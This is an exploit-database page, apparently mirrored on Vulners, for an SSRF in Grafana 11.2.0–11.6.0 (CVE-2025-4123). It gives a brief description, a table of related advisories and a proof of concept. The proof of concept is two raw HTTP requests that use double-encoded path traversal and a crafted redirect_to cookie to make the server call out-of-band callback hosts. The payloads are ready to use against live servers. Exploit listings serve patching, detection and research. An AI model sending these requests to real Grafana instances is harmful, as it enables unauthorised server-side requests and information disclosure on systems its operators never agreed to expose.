Vulners
Lucene search
Grafana 11.6.0 - SSRF
🗓️ 06 Apr 2026 00:00:00Reported by Beatriz Fresno NaumovaType 
exploitdb🔗 www.exploit-db.com👁 60 Views
| Reporter | Title | Published | Views | Family All 150 |
|---|---|---|---|---|
 | grafana -- XSS vulnerability | 26 Apr 202500:00 | – | freebsd |
| Grafana -- User deletion issue | 15 Apr 202500:00 | – | freebsd |
 | Exploit for Open Redirect in Grafana | 4 Jun 202512:42 | – | githubexploit |
| Exploit for Open Redirect in Grafana | 22 May 202515:34 | – | githubexploit |
| Exploit for Open Redirect in Grafana | 6 Jun 202520:24 | – | githubexploit |
 | CVE-2025-4123 | 22 May 202500:00 | – | attackerkb |
 | Alibaba Cloud Linux 3 : 0074: grafana (ALINUX3-SA-2025:0074) | 27 May 202500:00 | – | nessus |
| AlmaLinux 9 : grafana (ALSA-2025:7893) | 26 May 202500:00 | – | nessus |
| AlmaLinux 8 : grafana (ALSA-2025:7894) | 20 May 202500:00 | – | nessus |
| FreeBSD : grafana -- XSS vulnerability (45eb98d6-3b13-11f0-97f7-b42e991fc52e) | 28 May 202500:00 | – | nessus |
10
# Exploit Title: Grafana 11.6.0 - SSRF
# FOFA: app="Grafana"
# Date: 2-11-2025
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://grafana.com/
# Software Link: https://grafana.com/grafana/download
# Version: 11.2.0 - 11.6.0
# CVE: CVE-2025-4123
Description:
An SSRF (Server-Side Request Forgery) vulnerability exists in Grafana's `render/public` (and related public rendering) endpoints owing to a combination of client-side path traversal encoding and an open redirect. Under certain configurations — especially when anonymous access or vulnerable plugins (e.g., Image Renderer) are enabled — an attacker can cause the server to perform requests to attacker-controlled hosts or induce redirections that lead to SSRF and subsequent information disclosure.
POC:
GET /render/public/..%252f%255Cczeqm5.dnslog.cn%252f%253F%252f..%252f.. HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Fedora; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0
Connection: close
Accept-Encoding: gzip
GET /public/..%2F%5c123.czeqm5.dnslog.cn%2F%3f%2F..%2F.. HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/616.19 (KHTML, like Gecko) Version/17.7.17 Safari/616.19
Connection: close
Cookie: redirect_to=%2Frender%2Fpublic%2F..%25252f%25255Cd0nt31pu8bl7cn5ncca08sg68smps8h39.oast.live%25252f%25253F%25252f..%25252f..
Accept-Encoding: gzipData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Apr 2026 00:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.16.1 - 7.6
EPSS0.06888
SSVC